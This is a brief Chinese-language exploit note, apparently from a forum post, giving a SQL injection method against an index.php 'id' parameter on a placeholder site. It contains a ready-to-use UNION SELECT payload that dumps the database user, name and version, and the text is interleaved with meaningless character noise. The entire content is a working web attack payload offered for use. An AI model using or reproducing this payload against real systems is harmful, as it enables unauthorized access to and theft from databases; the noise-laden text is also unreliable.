利用方法:
( N9 D1 {0 U: {; ] http://www.xxx.com/index.php?id=[SQL]
* q1 e+ p$ n% }) o' s) h) `: E% e Demo: H) D5 M% t) c) v$ z2 D
http://www.xxx.com/index.php?id=-1' UNION SELECT 1,2,3,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),5,6,7,8,9,10,11,12,13--+ |